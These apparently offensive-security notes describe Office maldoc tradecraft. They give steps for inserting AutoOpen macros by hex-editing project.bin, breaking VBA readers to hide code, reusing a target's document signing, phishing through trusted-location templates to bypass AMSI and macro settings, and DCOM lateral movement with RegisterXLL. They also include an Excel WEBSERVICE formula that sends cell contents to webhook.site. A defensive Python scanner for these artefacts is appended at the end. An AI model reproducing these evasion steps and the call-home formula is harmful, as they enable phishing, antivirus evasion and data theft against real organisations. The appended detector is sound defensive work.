Macros / VBA

"MacroName=" in vbaData.xml shows whether an AutoOpen macro is registered, and "wne:name" is the name used to run that AutoOpen macro.

Macros are more than VBA: Excel 4.0 macros (XLM) also exist, but only in Excel.

VBA has two intermediate representations: P-Code and Exe-Code.

Every module stream starts with PerformanceCache (which should be empty).

Steps that tend to succeed:

  1. abuse ambiguity in the specs (e.g. ASCII and Unicode name fields pointing to the same module stream)

  2. explore undocumented features (Ctrl-F in the specs for "must be ignored" and "must not be present")

  3. try deviating from the specs

AV Bypass:

Add AutoOpen:

  1. open the document in 7zip > word > vbaData.xml

  2. change the name in MacroName to name.AUTOOPEN

  3. extract project.bin and load it into FlexHex

  4. select the stream/module name and press Ctrl-X, which removes the project stream from the bin file

  5. drop it back into 7zip and replace the old one

Stop a VBA reader from viewing the project:

  1. pull project.bin out of the document again with 7zip

  2. open it in FlexHex as a normal file

  3. keep the magic bytes of the file and overwrite some of the data (basically so the bin crashes the reader when it is parsed)

Mark of the Web and Trust:

If we also have a file from the target, we can reuse the signing from that file on the document carrying our payload.

Signature Abuse:

Some orgs use 'MailMerge' from an Excel address list to automate work and send personalised letters.

If a document is signed, we can execute VBA that's already signed (if enabled by the company).

In Excel, to avoid static analysis, call the VBA function from within a cell, i.e. =PrintDocument()

Within the Word document we can then create a new macro called autoopen(); when the code is re-run it executes automatically, avoiding all detection.

COM/DCOM exploit:

Trusted location:

Use a trusted location to host a template, then reference that template from a document used to phish.

This method avoids all macro settings, AMSI and all security settings within Office.

Lateral movement: from system A, as an admin on system B, start Excel via DCOM and force Excel on system B to execute an Excel document.

$a = [System.Activator]::CreateInstance([type]:

$a.RegisterXLL("C:\FilePath\")

The PST extension is normally disregarded by AV.

Playing with fields:

  1. open document -> insert -> fields

  2. MacroButton ->

Information leaking via DNS:

Get data from a folder (Power Query):

Refresh -> Connection Properties -> "Refresh data when opening the file" etc.

Navigate to the Advanced Editor -> res = Table.SelectRows(Source, each Text.Contains([Name], "dll"))

Call home:

=webservice("https://webhook.site/APIkey?"&encodeurl(A1))
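Defender-side check for the artefacts described on this page (the AutoOpen MacroName entry in vbaData.xml, an embedded vbaProject.bin, WEBSERVICE/ENCODEURL call-home formulas in worksheet cells, and refresh-on-open data connections). This is an added example, not code from the original notes; the file it scans is a constructed OOXML zip, and the markers it looks for are heuristics, so treat hits as triage leads rather than verdicts.

```python
import io
import re
import zipfile

# Heuristic patterns (assumptions based on the OOXML layout, not exhaustive).
AUTOOPEN_RE = re.compile(r'macroName="[^"]*AUTO_?OPEN', re.I)
FORMULA_RE = re.compile(r"<f[^>]*>([^<]*)</f>")
SUSPECT_FUNCS = ("WEBSERVICE", "ENCODEURL")


def scan_office_zip(data: bytes) -> list[str]:
    """Return sorted findings for an OOXML (docx/dotm/xlsx/xlsm) byte blob."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings.append(f"vba-project:{name}")
            elif low.endswith("vbadata.xml"):
                xml = z.read(name).decode("utf-8", "replace")
                if AUTOOPEN_RE.search(xml):
                    findings.append(f"autoopen-macroname:{name}")
            elif "/worksheets/" in low and low.endswith(".xml"):
                xml = z.read(name).decode("utf-8", "replace")
                for m in FORMULA_RE.finditer(xml):
                    formula = m.group(1).upper()
                    for fn in SUSPECT_FUNCS:
                        if fn + "(" in formula:
                            findings.append(f"suspicious-formula:{name}:{fn}")
            elif low.endswith("connections.xml"):
                xml = z.read(name).decode("utf-8", "replace")
                if 'refreshOnLoad="1"' in xml:
                    findings.append(f"refresh-on-open-connection:{name}")
    return sorted(findings)


def build_sample() -> bytes:
    """Constructed test document carrying each marker above (not a real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/vbaData.xml", '<wne:vbaSuppData><wne:mcds><wne:mcd '
                   'wne:macroName="Project.NewMacros.AUTOOPEN" wne:name="AutoOpen"/>'
                   '</wne:mcds></wne:vbaSuppData>')
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)  # OLE magic
        z.writestr("xl/worksheets/sheet1.xml", '<c r="A2"><f>WEBSERVICE('
                   '"https://example.invalid/?"&amp;ENCODEURL(A1))</f></c>')
        z.writestr("xl/connections.xml",
                   '<connections><connection id="1" refreshOnLoad="1"/></connections>')
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_office_zip(build_sample()):
        print(finding)
```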
